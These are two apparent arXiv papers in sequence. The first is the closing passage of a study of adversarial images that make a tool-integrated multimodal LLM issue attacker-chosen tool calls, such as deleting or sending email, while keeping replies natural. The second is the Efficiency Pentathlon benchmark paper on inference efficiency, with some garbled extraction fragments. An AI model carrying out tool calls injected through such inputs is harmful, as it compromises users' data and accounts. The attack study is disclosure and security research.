which is an indicator that annotators are mostly consistent in their preference. **Human Evaluation Result.** In Table 2, we show the human preference metric for the responses with and without the attack. We note that overall, the responses generated with the attack present show a drop of around 10% human preference scores compared to those generated without the attack. This indicates that our attack maintains the response utility fairly indistinguishable from clean responses. **Correlation Between Automated Metrics and Human Preferences.** We noticed that in Table 2 the GPT-4 Selection, BLEU, and Rouge metrics show unusual drops when the attack is present (much larger than the 10% drop in human preference scores). Therefore we conduct a study to understand which automated metrics best correlate with human preference. Here we only focus on the 214 responses generated with the attack present. Each automated metric represents a preference score on the naturalness and reasonableness of each response (for Loss and GPT-4 Selection we negate the value). We then calculate the AUC ROC score of the automated metrics against the human preference results (see Table 3). From the table, it is clear that for both image-related questions and image-unrelated questions, the Loss metric, among all the automated metrics, correlates with the human preference the best, by a large margin. Therefore, we decide to use only the loss metric for the evaluation of response utility. A possible concern is whether the averaged response utility metric would be misleading -- is it possible that the responses are less likely to be reasonable when the adversarial image successfully triggers a correct tool invocation? We verified that this is not the case in Appendix A.8. ### Experiment Results **The attack is successful, stealthy, and generalizable.** In Table 4 we evaluate our attack method on different attack variants, different images and on the unseen in-domain test set. For the three easier attack variants delete_email, send_email, send_email_hard, the success rate is close \begin{table} \begin{tabular}{l|c c c c c c} \hline \hline \multirow{2}{*}{Resposes} & \multirow{2}{*}{Human\(\uparrow\)} & \multirow{2}{*}{Loss \(\downarrow\)} & \multirow{2}{*}{Selection \(\downarrow\)} & \multirow{2}{*}{BLEU \(\uparrow\)} & \multicolumn{2}{c}{Rouge} \\ & & & & & 1 \(\uparrow\) & 2 \(\uparrow\) & L \(\uparrow\) \\ \hline \multicolumn{6}{c}{_image-related_} \\ \hline w/o attack & 48 & 1.00 & 23 & 84 & 93 & 90 & 92 \\ w/ attack & 37 & 1.20 & 83 & 38 & 65 & 49 & 58 \\ \multicolumn{6}{c}{_image-unrelated_} \\ \hline w/o attack & 86 & 0.71 & 24 & 72 & 82 & 73 & 77 \\ w/ attack & 77 & 0.84 & 69 & 34 & 56 & 38 & 45 \\ \hline \hline \end{tabular} \end{table} Table 2: Evaluation of response utility on responses generated with and without attack present respectively given both image-related or image-unrelated prompts. Observe a drop of only 10% human preference scores with and without attack. \begin{table} \begin{tabular}{|c|c c|} \hline Metric & related & unrelated \\ \hline Loss & 72 & 77 \\ Selection & 50 & 59 \\ BLEU & 61 & 64 \\ Rouge-1 & 60 & 59 \\ Rouge-2 & 60 & 61 \\ Rouge-L & 61 & 58 \\ \hline \end{tabular} \end{table} Table 3: AUC ROC scores for various automated metrics predicting human preference for response utility. to 100% on the image-related set, while slightly lower on the image-unrelated set. For all attack variants, the SSIM score is close to 100%, and the Loss metric shows around 10% less preference than clean model generations, aligned with what we've seen in Table 2. Even though the success rates for the latter two more challenging attacks are relatively lower, it is fine because as long as the attack remains stealthy, it will take effect and harm users after it is spread to enough victims. **The attack is also generalizable to out-domain samples.** In Table 5 we evaluate on the unseen, out-domain samples from the out-domain test set, using the same adversarial images in Table 4. The results indicate that the attacked images transfer almost equally well to out-domain examples. We also experimentally verified that (1) the response utility controlling variable \(\lambda_{r}\) improves the response utility and (2) we can sacrifice image stealthiness to make the attack more likely to be successful for hard attack variants in Appendix A.7. These bring more flexibility and customizability to the attack according to different use cases. ## 5 Discussion & Conclusion In this paper, we propose a novel attack against multimodal LLMs integrated with third-party tools. Adversarial images crafted in our attack are capable of manipulating the victim LLM to generate attacker-specified tool invocations following complex non-natural-language syntax and thus can harm the confidentiality and integrity of users' resources. In addition, these adversarial images generalize to broad user-LLM conversations and are highly stealthy since they look benign and do not affect a natural and reasonable user-LLM conversation. However, our attack has the limitation of being white-box _i.e.,_ requiring access to the model parameters, and does not apply to closed-source LLMs. Also, the attack currently only shows proof \begin{table} \begin{tabular}{l c|c c c c c c c} \hline \hline \multirow{2}{*}{Attack Variant} & \multirow{2}{*}{Image} & \multirow{2}{*}{SSIM} & \multicolumn{3}{c}{In-domain Related} & \multicolumn{3}{c}{In-domain Unrelated} \\ & & & Syntax & Exact & Loss & Syntax & Exact & Loss \\ \hline \multirow{3}{*}{delete\_email} & **\#1** & 0.91 & 98 & 98 & 1.09 & 78 & 78 & 0.8 \\ & **\#2** & 0.92 & 90 & 90 & 1.11 & 55 & 55 & 0.82 \\ & **\#3** & 0.87 & 92 & 92 & 1.11 & 73 & 73 & 0.78 \\ \hline \multirow{3}{*}{send\_email} & **\#4** & 0.90 & 98 & 98 & 1.08 & 69 & 69 & 0.77 \\ & **\#5** & 0.93 & 92 & 92 & 1.18 & 61 & 58 & 0.88 \\ & **\#6** & 0.92 & 100 & 100 & 1.04 & 69 & 69 & 0.78 \\ \hline \multirow{3}{*}{send\_email\_hard} & **\#6** & 0.91 & 100 & 100 & 1.14 & 61 & 56 & 0.86 \\ & **\#7** & 0.91 & 100 & 68 & 1.08 & 48 & 31 & 0.87 \\ & **\#8** & 0.88 & 86 & 0 & 1.19 & 31 & 0 & 0.78 \\ \hline \multirow{3}{*}{book\_ticket} & **\#8** & 0.90 & 22 & 20 & 1.51 & 9 & 8 & 0.97 \\ & **\#9** & 0.94 & 0 & 0 & 1.23 & 0 & 0 & 0.82 \\ & **\#9** & 0.91 & 46 & 44 & 1.3 & 9 & 9 & 1.07 \\ \hline \multirow{3}{*}{md\_url\_query} & **\#1** & 0.89 & 34 & 2 & 1.26 & 23 & 6 & 0.99 \\ & **\#1** & 0.89 & 0 & 0 & 1.09 & 0 & 0 & 0.71 \\ & **\#1** & 0.91 & 32 & 10 & 1.02 & 27 & 8 & 0.77 \\ \hline \hline \end{tabular} \end{table} Table 4: Evaluation of our attack on image stealthiness (SSIM), attack success rate (Syntax/Exact %), and response utility (Loss) on the in-domain test set for image-related and -unrelated prompts. \begin{table} \begin{tabular}{l c|c c c c c c} \hline \hline \multirow{2}{*}{Attack Variant} & \multirow{2}{*}{Image} & \multirow{2}{*}{SSIM} & \multicolumn{3}{c}{Out-domain Related} & \multicolumn{3}{c}{Out-domain Unrelated} \\ & & & Syntax & Exact & Loss & Syntax & Exact & Loss \\ \hline \multirow{3}{*}{delete\_email} & **\#1** & 0.91 & 98 & 98 & 1.18 & 66 & 66 & 0.58 \\ & **\#2** & 0.92 & 62 & 62 & 0.98 & 54 & 54 & 0.76 \\ & **\#3** & 0.87 & 92 & 92 & 0.83 & 68 & 68 & 0.58 \\ \hline \multirow{3}{*}{send\_email} & **\#1** & 0.90 & 100 & 100 & 1.18 & 62 & 62 & 0.6 \\ & **\#2** & 0.93 & 66 & 66 & 1.14 & 50 & 48 & 0.68 \\ & **\#1** & 0.92 & 98 & 98 & 0.84 & 80 & 80 & 0.64 \\ \hline \multirow{3}{*}{send\_email\_hard} & **\#1** & 0.91 & 96 & 96 & 1.27 & 56 & 50 & 0.69 \\ & **\#2** & 0.91 & 86 & 80 & 1.0 & 28 & 20 & 0.78 \\ \cline{1-1} & **\#2** & 0.88 & 60 & 0 & 0.9 & 40 & 0 & 0.66 \\ \hline \hline \end{tabular} \end{table} Table 5: Evaluation of the trained attack from Table 4 on out-domain test set. We pick only the three easier attack types as they are mostly successful in the in-domain setting. of validity on a single multimodal LLM, but not for all such models. Along this line, it would be interesting to explore black-box transferability to other multimodal LLMs. The attack and methodology described in this paper may be utilized in a malicious way by real-world attackers. Despite the risk involved, we believe it's crucial to disclose such risks of multimodal LLMs in full before more open-weight multimodal LLMs integrated with tools are adopted in production. We will publish the entire codebase and all adversarial images we used in this paper, in complementary to the appendices. We also suggest that strict authorization should be enforced on LLMs' access to third-party tools as a bottom-line defense for now. ### Acknowledgement We thank local volunteers who help us with human annotations and in-domain test set creation.
2307.09701
Efficiency Pentathlon: A Standardized Arena for Efficiency Evaluation
Rising computational demands of modern natural language processing (NLP) systems have increased the barrier to entry for cutting-edge research while posing serious environmental concerns. Yet, progress on model efficiency has been impeded by practical challenges in model evaluation and comparison. For example, hardware is challenging to control due to disparate levels of accessibility across different institutions. Moreover, improvements in metrics such as FLOPs often fail to translate to progress in real-world applications. In response, we introduce Pentathlon, a benchmark for holistic and realistic evaluation of model efficiency. Pentathlon focuses on inference, which accounts for a majority of the compute in a model's lifecycle. It offers a strictly-controlled hardware platform, and is designed to mirror real-world applications scenarios. It incorporates a suite of metrics that target different aspects of efficiency, including latency, throughput, memory overhead, and energy consumption. Pentathlon also comes with a software library that can be seamlessly integrated into any codebase and enable evaluation. As a standardized and centralized evaluation platform, Pentathlon can drastically reduce the workload to make fair and reproducible efficiency comparisons. While initially focused on natural language processing (NLP) models, Pentathlon is designed to allow flexible extension to other fields. We envision Pentathlon will stimulate algorithmic innovations in building efficient models, and foster an increased awareness of the social and environmental implications in the development of future-generation NLP models.
Hao Peng, Qingqing Cao, Jesse Dodge, Matthew E. Peters, Jared Fernandez, Tom Sherborne, Kyle Lo, Sam Skjonsberg, Emma Strubell, Darrell Plessas, Iz Beltagy, Evan Pete Walsh, Noah A. Smith, Hannaneh Hajishirzi
2023-07-19T01:05:33Z
http://arxiv.org/abs/2307.09701v1
# Efficiency Pentathlon: ###### Abstract Rising computational demands of modern natural language processing (NLP) systems have increased the barrier to entry for cutting-edge research while posing serious environmental concerns. Yet, progress on model efficiency has been impeded by practical challenges in model evaluation and comparison. For example, hardware is challenging to control due to disparate levels of accessibility across different institutions. Moreover, improvements in metrics such as FLOPs often fail to translate to progress in real-world applications. In response, we introduce efficiency Pentathlon, a benchmark for holistic and realistic evaluation of model efficiency. Pentathlon focuses on inference, which accounts for a majority of the compute in a model's lifecycle. It offers a strictly-controlled hardware platform, and is designed to mirror real-world applications scenarios. It incorporates a suite of metrics that target different aspects of efficiency, including latency, throughput, memory overhead, number of parameters, and energy consumption, hence the name **Pentathlon**. It also comes with a software library that can be seamlessly integrated into any codebase and enable evaluation. As a standardized and centralized evaluation platform, Pentathlon can drastically reduce the workload to make fair and reproducible efficiency comparisons. While initially focused on natural language processing (NLP) models, Pentathlon is designed to allow flexible extension to other fields. We envision Pentathlon will stimulate algorithmic innovations in building efficient models, and foster an increased awareness of the social and environmental implications in the development of future-generation NLP models. ## 1 Introduction The remarkable recent progress in artificial intelligence owes much to advances in large-scale deep learning models (Brown et al., 2020; Chowdhery et al., 2022; Thoppilan et al., 2022, _inter alia_). However, their rapidly-increasing computational demands have introduced substantial challenges. The barrier to entry to cutting-edge research is raised, particularly impacting researchers and practitioners with fewer resources and exacerbating disparities in the AI research landscape. Moreover, the escalating energy consumption associated with these computation-intensive models leads to serious environmental concerns (Lacoste et al., 2019; Schwartz et al., 2020; Henderson et al., 2020; Strubell et al., 2020, _inter alia_). Therefore, building more efficient models for AI systems has become a pressing challenge, drawing widespread attention from the community (Reddi et al., 2020; Tay et al., 2020; Treviso et al., 2022; Liu et al., 2022; Yao et al., 2022; Fu et al., 2023, _inter alia_). However, a lack of standardized evaluation protocols makes it challenging to measure the progress in efficiency improvements and obstructs the efforts in developing more efficient models. In many cases, models are evaluated in scenarios that hardly reflect the deployment of machine learning models in practice (Henderson et al., 2020). Moreover, some widely-adopted efficiency metrics such as FLOPs often poorly correlate with models' real-world efficiency performance (Dehghani et al., 2022; Fernandez et al., 2023). The issue is exacerbated by several practical challenges. For instance, hardware is a critical confounding factor in efficiency comparisons, but is very challenging to control in practice, due to disparate levels of hardware accessibility across institutions. Consequently, this leads to disconnections between efficiency improvements in research and tangible progress in practice. There is a pressing need for a standardized efficiency evaluation framework. To address these challenges, we present Pentathlon. It is designed to establish a standardized platform for evaluating the _inference_ efficiency of AI models. As shown by Patterson et al. (2022) and Wu et al. (2022), inference accounts for over 60% of energy consumption in real-world machine learning workloads. Pentathlon aims to provide comprehensive and realistic evaluation of efficiency, and offer the community a platform to make fair comparisons in a strictly controlled environment. To achieve this, the name Pentathlon design choices: * **Controlled hardware environment** (SS2.1): hosted by a dedicated server, Pentathlon provides a centralized platform with a strictly controlled hardware environment. This removes the necessity for practitioners to reproduce previous works on their own hardware for fair comparisons and allows easy comparisons with models previously evaluated on Pentathlon using identical hardware. Moreover, it allows us to use power monitoring devices to accurately measure the energy consumption during models' inference, which was previously impossible. * **Realistic scenarios** (SS2.2): It evaluates models under various scenarios specifically designed to mirror real-world deployment contexts, allowing different approaches to batching input instances, aiming to bridge the gap between research context and practical applications. * **Comprehensive metrics** (SS2.3): Pentathlon evaluates models with five crucial metrics, including throughput, latency, memory overhead, the number of parameters, and energy consumption, hence the name **Pentathlon**. This provides a more holistic understanding of a model's efficiency. * **Flexibility** (SS2.4) Pentathlon is flexible by design and can be seamlessly integrated into any codebase. Although we focus on natural language processing (NLP) models in this paper, Pentathlon can be easily extended to other fields. Pentathlon is ready to accept submissions, helping to reduce the workload of conducting fair efficiency comparisons: [https://github.com/allenai/efficiency-pentathlon](https://github.com/allenai/efficiency-pentathlon). As we demonstrate in the experiments (SS3), Pentathlon can provide fresh insights into existing models. Through our comparisons of several established machine translation models, the comprehensive evaluation offered by Pentathlon highlights the particular effectiveness of quantization in large models. Furthermore, Pentathlon's energy evaluation component reveals new perspectives on the models' energy consumption during inference. We envision that by offering standardized efficiency evaluation, Pentathlon will stimulate the development of more efficient models and foster a deeper awareness of the computational costs of AI research, and accelerate progress on reducing them. Figure 1: By submitting to Pentathlon, practitioners can compare their models against all previous submissions on identical hardware, eliminating the need to re-implement previous works and substantially reducing the workloads for fair efficiency comparisons. Models are evaluated in four realistic scenarios designed to mirror real-world applications. Our platform evaluates the submission across five crucial efficiency metrics, including throughput, latency, memory overhead, the number of parameters, and energy consumption, hence the number of parameters, the entire Pentathlon design choices: ## 2 &# Efficiency Pentathlon This section discusses the current challenges in efficiency evaluation and outlines the design choices we adopted in Pentathlon to effectively address them. ### Controlling the Hardware for Fair Efficiency Comparisons The hardware stands as a critical confounding factor when comparing efficiency, and can significantly influence the conclusions of such comparisons. As demonstrated by several recent studies, the trends in efficiency comparisons can vary substantially when different accelerators are used (Peng et al., 2021; Kasai et al., 2021; Wu et al., 2022; Wang et al., 2020, _inter alia_). Compounding this issue is the practical difficulty in controlling for hardware, primarily because access to hardware platforms often varies among institutions. This is a major obstacle for fair efficiency comparisons. Even with publicly available implementations, practitioners often need to adapt these to their own hardware environments to ensure fair comparisons. **Our approach.** Pentathlon aims to stimulate algorithmic innovations that can generalize across different hardware. Therefore we control for hardware while conducting efficiency comparisons and offer a varied selection of hardware to simulate different use cases. Pentathlon is hosted with a dedicated in-house server. Participants can submit their models' code and checkpoints to our server through an easy-to-use tool that we provide (SS2.4). This ensures that all models evaluated using Pentathlon use an identical hardware environment, guaranteeing fair comparisons. By requiring code submission Pentathlon helps improve transparency. The specific implementation choices for each submission, such as data IO and padding, will be thoroughly documented. This is appealing because it helps disentangle the efficiency gains due to _algorithmic innovations_ from those achieved by better implementations that can equally benefit all models. Further, a dedicated in-house server allows us to measure energy consumption, which would otherwise be very challenging to incorporate (SS2.3). The hosting machine of Pentathlon has two NVIDIA RTX 8000 GPUs, two Intel Xeon Ice Lake Gold 6348 28-Core CPUs, and 1TB DDR4 memory. It supports evaluation using GPUs and CPUs, and CPUs only. We plan to extend Pentathlon to offer a broader selection of hardware in the near future.2 Footnote 2: We plan to use the NVIDIA Jetson TX2 Module ([https://developer.nvidia.com/embedded/jetson-tx2](https://developer.nvidia.com/embedded/jetson-tx2)) to simulate limited-resource settings such as on an automobile, and extend Pentathlon to a smartphone to evaluate machine learning models designed to run on mobile devices. To accurately measure each submission's efficiency without interference, we have implemented a scheduler on the server. This ensures that only one inference workload is running at any given time. In Pentathlon, the efficiency measurement begins when the model has been loaded and is ready for predictions, excluding the overhead associated with both model and data loading. ### Realistic Evaluation Scenarios Designed to Emulate Real-world Applications \begin{table} \begin{tabular}{l c c c c c c} \hline \hline **Scenarios** & **Acc.** & **TP.** & **Latency** & **Mem.** & **Energy \& CO\({}_{2}\)** & **BSZ** & **Online** \\ \hline **Fixed batching** & ✓ & ✓ & ✓ & ✓ & ✓ & User specified & ✓ \\ **Poisson batching** & ✗ & ✓ & ✓ & ✓ & ✓ & Random & ✓ \\ **Single stream** & ✗ & ✗ & ✓ & ✓ & ✓ & 1 & ✓ \\ **Offline** & ✗ & ✓ & ✗ & ✓ & ✓ & User specified & ✗ \\ \hline \hline \end{tabular} \end{table} Table 1: Four evaluation scenarios and the metrics they focus on. Acc.: accuracy, TP.: throughput, Mem.: memory. In the three online scenarios, Pentathlon interfaces with the submitted model via standard input/output (stdio), providing inputs and capturing outputs in real-time. Rearrangement of instance order is prohibited in these scenarios. In the offline scenario, the model is given immediate access to all evaluation instances via a file, enabling techniques such as sorting by lengths. typically assessed with a fixed batch size. Such disparity underscores the pressing need for evaluation protocols that better reflect real-world deployments. **Our approach.** Inspired by Reddi et al. (2020), we include four distinct evaluation scenarios to provide a comprehensive evaluation of NLP models in a variety of realistic settings: * **Fixed batching.** The evaluation data is first randomly shuffled before being grouped into batches of a user-specified batch-size. This setting is intended to mimic typical research experimental settings. We defer to the users choosing optimal batch sizes for their models. * **Poisson batching** is similar to the fixed batching scenario, but the size of each batch is randomly drawn from a Poisson distribution with a mean of batch-size: batch-size\({}_{\text{Pois}}\sim\text{Pois}(\text{batch-size})\). This setup aims to simulate an online service where the volume of requests is unpredictable but the average can be estimated. * **Single stream** randomly shuffles the evaluation instances and uses a batch size of one, reflecting the applications processing one request at a time. * **Offline:** In this scenario, the model has immediate access to the entire evaluation dataset, enabling techniques such as sorting the inputs by length or adaptive batching to enhance throughput and memory efficiency. This scenario reflects large-scale, offline tasks. These varied evaluation scenarios are designed to highlight the strengths and weaknesses of different models in diverse deployment contexts. ### A Diverse Set of Metrics for Comprehensive Efficiency Evaluation AI systems' efficiency in practical contexts is multifaceted and can hardly be adequately represented by any single metric. Different use cases prioritize different efficiency aspects. For example, a model deployed on mobile devices prioritizes energy efficiency, an offline model requires optimal throughput, while an online service model demands low latency. However, the widely-used metrics often fail to show strong correlations with these diverse practical aspects of efficiency. Take, for instance, the number of floating point number operations (FLOPs) a model takes for performing a workload. It has become a standard efficiency metric partly due to its hardware and implementation-agnostic nature, highlighting the algorithmic advancements in model efficiency (Schwartz et al., 2020). Yet recent research has cast doubt on its relevance, showing that it is a poor indicator of many practical metrics including throughput, latency, and energy consumption (Henderson et al., 2020). Even for models sharing similar architectures and numbers of parameters, their energy efficiency can diverge significantly under identical workloads, partly due to specific deep learning operations they are implemented with (Cao et al., 2021). This highlights the limitations of conventional evaluation protocols, which risk oversimplifying efficiency comparisons by attempting to encapsulate performance in a single measure. Instead, we propose a more comprehensive approach that considers a diverse suite of metrics. It more accurately reflects the multifaceted nature of efficiency in AI models. **Our approach.** Our benchmark's suite of evaluation metrics includes the following: * **Throughput** measures the volume of data a system can process in a unit of time. We measure throughput with instances/s; for tasks that require generating text, we also consider words/s. * **Latency**, in milliseconds. It quantifies the delay between the system receiving a user request and providing a response. Complementing throughput, it's especially critical in real-time applications, such as smartphone-based AI assistants. * **Memory overhead**, in GiB, provides insight into a system's applicability in low-resource settings, where available memory can be a bottleneck. In resource-abundant settings, lower memory overhead allows larger batch sizes during inference, improving metrics such as throughput. Our benchmark measures maximum CPU and GPU (if applicable) memory consumption. * **Energy consumption and carbon footprint.** The energy overhead of a system, measured in W-h, indicates its suitability for battery-powered devices. Combined with carbon intensity data, it can also assess a model's carbon footprint in terms of the amount of CO\({}_{2}\) emissions, providing an environmental impact comparison for models deployed in practice. We provide more details about measuring energy consumption in SS2.3.1. * **Model size**, measured in the number of parameters, serves as an indicator of models' storage overhead, and often correlates with its memory overhead. Our approach provides a holistic view of model efficiency, with each focusing on specific application contexts, allowing practitioners to select efficient methods catered to their applications. #### 2.3.1 Challenges in Measuring Energy and our Solution While most of the metrics above can be measured with existing tools, accurately measuring energy presents unique challenges, primarily due to the lack of established software for this purpose. Although CUDA offers toolkits to measure GPU power, the power usage of CPUs, DRAM, and disks is only accessible on specific types hardware and requires root access (Khan et al., 2018). Many existing methods estimate energy consumption for _training_ using GPU energy alone (Luccioni et al., 2022; Liang et al., 2022). However, as we will demonstrate in the experiments, this approach is not suitable for our purposes for two primary reasons. First, it excludes energy comparisons of models running on CPUs, which our study aims to explore. Second, inference tasks by nature entail more frequent data IO interactions, imposing more significant workloads on CPUs, DRAM, disks, etc., compared to training. In our experiments, they account for more than 60% of energy consumption--a significant increase compared to previous estimates for training (Dodge et al., 2022). Therefore, it is essential to measure not only GPU energy but the total energy consumed by the entire machine accurately. To this end, we use an energy-monitoring device to measure the power consumption.3 This data, in conjunction with the model's run time, can be used to calculate the model's energy consumption. Physically connected to the host machine's power cables, this device's sensors provide accurate real-time power usage data. According to the manufacturer, the error rate is \(\pm 1.2\%\). Footnote 3: We use an emonTx V4 for power consumption measurement: [https://shop.openenergymonitor.com/single-phase-6-channel-energy-monitoring-emontx-v4/](https://shop.openenergymonitor.com/single-phase-6-channel-energy-monitoring-emontx-v4/). The power consumption is calculated by subtracting the host machine's idling power from the meter reading during an inference run. To calculate the carbon emissions, we use the carbon intensity data provided by Schmidt et al. (2022) based on the geographical location and time of the day. ### Ensuring Flexibility in Pentathlon Requiring code and checkpoint submission imposes additional implementation effort from participants, a tradeoff we believe is worthwhile for achieving fair comparisons on a strictly-controlled hardware platform. Recognizing from past benchmark efforts that this might discourage practitioners from participating, we have made a concerted effort to ensure that Pentathlon can be easily integrated into existing code bases and to streamline the submission process.4 Footnote 4: This is a lesson that some of the authors learned from the NAACL2022 reproducibility track: [https://2022.naacl.org/blog/reproducibility-track/](https://2022.naacl.org/blog/reproducibility-track/) **Accommodating diverse software frameworks.** We aim to encourage wide participation and ensure our platform is accessible to practitioners accustomed to various software infrastructures. Therefore, Pentathlon makes no assumption about the submission's deep learning framework (if a deep learning model is used at all) or the programming language it's implemented in. We require that every submission: (1) Include a GitHub repository containing the code and listing dependencies (this repository does not need to be public); (2) Interface the model to read inputs from stdin and write outputs to stdout;5 (3) Implement the necessary tools to download the model checkpoint for evaluation. We provide detailed instructions and examples to guide practitioners through this process. Based on our internal testing, learning to integrate Pentathlon into an existing codebase and submitting it to our server for evaluation takes a participant less than one hour; and an onward submission takes a single command line. Furthermore, Pentathlon can serve as a standalone tool for preparing the submission and providing basic efficiency metrics. Footnote 5: We provide a Python tool for this stdio interaction. Users can implement their own interfaces if they decide to use other programming languages. In providing abstractions around the evaluation interface, we limit assumptions made around the underlying system implementation and allow for the installation of user dependencies as needed. This enables support for a diversity of backend frameworks and runtimes as the user is not constrained to a single deep learning framework or data format. For example, Pentathlon allows users to use both research frameworks (e.g., eager execution PyTorch and TensorFlow 2.0) as well as specialized inference runtimes (e.g., ONNX Runtime, TVM, and TensorRT). The additional flexibility provided by this format allows Pentathlon to remain accessible to researchers familiar with a particular framework, while also enabling the exploration of different means of increasing overall _end-to-end efficiency_ of the machine learning system that is available in deployment settings. This design allows users to evaluate efficiency gains from improving different aspects of the overall system, such as those obtained from optimizing the model architectures or from utilizing faster software frameworks. Pentathlon builds upon established software developed and maintained by AI2. These tools have been thoroughly tested by AI2 researchers and engineers, enhancing Pentathlon's robustness and ease of use. For example, empowered by Catwalk, Pentathlon supports a diverse set of NLP tasks, and allows Pentathlon to easily extend to many other tasks and research fields.6 Footnote 6: Catwalk provides a unified interface to a broad range of existing NLP tasks and models. A list of tasks that are currently supported by Pentathlon can be found at [https://github.com/allenai/catwalk](https://github.com/allenai/catwalk). ## 3 Experiments We use Pentathlon to benchmark several established models for machine translation and text classification with the RAFT dataset (Alex et al., 2021). In the interest of space, we refer the readers to the appendices for the RAFT experiments. Machine Translation.Improving the efficiency of machine translation (MT) and text generation models has gained significant momentum. A growing number of recent workshops and shared tasks have held dedicated efficiency tracks (Birch et al., 2018; Hayashi et al., 2019; Heafield et al., 2020; Akhbardeh et al., 2021; Kocmi et al., 2022, _inter alia_). Aligned with this goal, we seek to contribute to this ongoing effort. To this end, our initial experiments with Pentathlon focus on machine translation. Dataset and setting.We present results for WMT14 DE-EN (Bojar et al., 2014), a well-studied dataset that is selected as the testbed in the efficiency tracks of two recent WMT workshops (Akhbardeh et al., 2021; Kocmi et al., 2022). Pentathlon already supports many other MT and text generation datasets, and can be easily extended to more. We focus on DE->EN translation here; additional results with EN->DE are available in the Appendices. Balancing the inference wall clock time and accurately measuring the efficiency, we use different numbers of evaluating instances across the four scenarios. For WMT14 DE-EN: * **Fixed batching** uses the full test set of 3,002 instances. It also measures the translation quality using SacreBLEU (Post, 2018). * **Poisson batching** randomly draws 4,000 instances (with replacement) from the test set. * In the **single stream** scenario, 1,000 randomly selected test instances are used. * Differently from others, the **offline** scenario randomly selects 8,000 instances from the _training_ data.7 We ensure that the selected instances have an average length matching that of the test set. Footnote 7: In this scenario the models are granted immediate access to all instances and can sort them by length. If the instances _were_ drawn from the test set, this would result in the artifact that groups duplicates of the same instance in the same batch, which we aim to avoid. Controlling for the random seed, all models are evaluated on the same set of instances in the same order, and identical batch sizes in the Poisson batching scenario. Preliminary experiments indicate that the models' efficiency performance remains consistent across multiple runs. As such, we opt out of conducting multiple rounds of evaluation. All models are evaluated on one RTX8000 GPU, and the inference batch sizes for the fixed batching and offline scenarios are tuned to the allowable maximum for the available GPU hardware. Models.We benchmark the following publicly-available models covering a wide range of sizes: * **MBART**(Tang et al., 2021): a 610M-parameter-sized Transformer model for multilingual translation. It has two variants, many-to-one (MBART M2O) translates other languages into English, and many-to-many (M2M) can translate between multiple language pairs. We use the **MBART50** variant, originally pre-trained on monolingual corpora in 25 languages, by fine-tuning on parallel corpora in across 50 languages for direct use as a translation engine. * **M2M100**(Fan et al., 2021): Transformer-based multilingual models for many-to-many translation. We report on two sizes with 418M and 1.2B parameters respectively. The **M2M100** model is trained using parallel corpora (e.g., WMT corpora described above) and mined bitext to enable translation between any two of 100 languages. * **OPUS**(Tiedemann and Thottingal, 2020): a bilingual Transformer model with 74M parameters for DE->EN translation. The model is trained on OPUS bitext corpora (Tiedemann, 2012). * **WMT19-Meta**(Ng et al., 2019): a DE->EN Transformer model with 314M parameters. This system won the WMT19 task on German to English news translation (Barrault et al., 2019). * **WMT21-Meta**(Tran et al., 2021): a M2O Transformer model with 4.7B parameters. Unlike **WMT19-Meta**, this model is multilingual and trained on data from all languages for the WMT 2021 shared task.Training data is a mixture of parallel corpora, monolingual corpora and mined bitext. This multilingual system ranked high in several WMT21 news translation tasks (Akhbardeh et al., 2021). We refer to Tran et al. (2021) for complete details. We evaluate using PyTorch with both full precision (FP32) and half precision (FP16), to study the effect of quantization. In our preliminary experiments, we found that employing more aggressive quantization techniques such as 8-bit and 4-bit quantization using naive methods led to severely compromised translation quality, with the BLEU score dropping to around 1, effectively resulting in a failed translation. All models' implementation and checkpoints are available on Hugging Face. **Results.** Figure 2 summarizes the efficiency performance of different models in on the WMT14 DE-EN dataset, along with their translation quality. Overall, models trained for English translation demonstrated better trade-offs between translation quality and efficiency. Notably, OPUS outperforms the much larger MBART M2M and M2M100 models in both accuracy and all aspects of efficiency, and is the most efficient model among all. Although WMT21-Meta, the largest model considered, provides the highest BLEU score, it takes a substantial hit in efficiency. Interestingly, despite being more than four times larger, WMT19-Meta achieves efficiency performance comparable to OPUS in latency, memory overhead, and energy consumption, and significantly outperforms it in terms of BLEU. However, it falls short of OPUS in throughput. This observation confirms that relying on a single efficiency metric risks oversimplifying the complex performance landscape of efficiency in practical applications. With ONNX, the models achieve over 20% improvements in latency and throughput in the single-stream scenario, accompanied by a significant reduction in memory and energy overhead. However, less efficiency improvement is observed in other scenarios with larger batch sizes. **Larger models benefit more from FP16 quantization.** By comparing Figures 1(a) and 1(b), we observe that FP16 quantization improves all models' efficiency performance (except #Params.), particularly memory overhead. Larger models appear to benefit more from quantization. As shown in Figures 1(c) and 1(d), while OPUS experiences minimal efficiency gains from quantization apart from increased throughput, WMT21-Meta's efficiency dramatically improves with FP16 quantization, nearly doubling throughput and reducing latency, memory overhead, and energy consumption by half or more. These results highlight the promise of advancing quantization techniques for larger models in order to improve the trade-off between accuracy and efficiency. **In single-GPU inference, the GPU accounts for only a minor portion of the energy consumption.** This is demonstrated by Figure 3. This experiment uses a single RTX8000 GPU with a maximum power of 260W. We note that the GPU rarely operates at full power, implying that GPU hours, a metric commonly used to gauge training computational overhead (Henderson et al., 2020; Kasai et al., 2021), is unsuitable for estimating inference GPU energy. Even during the most GPU-intensive runs by the WMT21-Meta model, where it does operate at full capacity, the GPU only accounts for one third of the total machine power. This observation diverges from previous findings on _training_, where GPUs are estimated to constitute around 70% of the energy usage (Dodge et al., 2022). We attribute the difference to the increased memory and disk IO demands during inference, coupled with lower GPU utilization and increased idling time due to smaller compute kernels during inference This disparity suggests that efficiency conclusions drawn from training need careful examination when applied to inference. Interestingly, we observe a correlation between higher GPU power and higher power utilization by other components. We conjecture that this is at least partially due to the increased fan activity needed for cooling. Figure 3: Power consumption in Watts across different model inference runs in the single stream (3a) and offline (3b) scenarios. Purple bars indicate the power consumed by the GPU, while the light blue bars represent the power consumption of all other system components, excluding the GPU. The white numbers denote the absolute power consumption values in Watts, while the percentage numbers atop the bars provide the proportion of power consumption that is accounted for by the GPU. Figure 2: Performance of various models on the WMT14 DE-EN, represented in terms of BLEU scores and a range of efficiency metrics. To more accurately reflect real-world applications, the figures include throughput metrics from the offline scenario, latency and GPU memory metrics from the single stream scenario, and energy metrics from the fixed batching scenario. For all metrics, **outer rings indicate better performance**. #Params is presented on a logarithmic scale. Related Work There is growing interest in putting efficiency in NLP benchmarks. Dynabench Kiela et al. (2021) and Dynaboard Ma et al. (2021) concentrate on dynamic dataset creation and model assessment, incorporating efficiency metrics such as throughput and memory, alongside fairness and robustness HELM Liang et al. (2022) evaluates language models with seven metrics including efficiency. Though training efficiency in HELM covers energy, carbon, and wallclock time, the inference efficiency in this benchmark only measures inference runtime, and the energy and carbon footprint are only roughly estimated. HULK Zhou et al. 